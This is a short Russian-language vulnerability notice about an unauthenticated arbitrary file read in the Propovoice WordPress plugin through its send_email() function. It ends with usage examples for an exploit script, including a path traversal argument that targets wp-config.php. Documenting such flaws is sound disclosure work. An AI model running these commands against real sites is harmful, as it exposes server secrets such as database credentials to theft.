
Propovoice <= 1.7.6.7 - Неаутентифицированное произвольное чтение файлов
Propovoice <= 1.7.6.7 - Неаутентифицированное чтение произвольных файлов
Плагин Propovoice: All-in-One Client Management System для WordPress уязвим к произвольному чтению файлов во всех версиях до 1.7.6.7 включительно через функцию send_email(). Это позволяет неаутентифицированным злоумышленникам читать содержимое произвольных файлов на сервере, которое может содержать конфиденциальную информацию.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php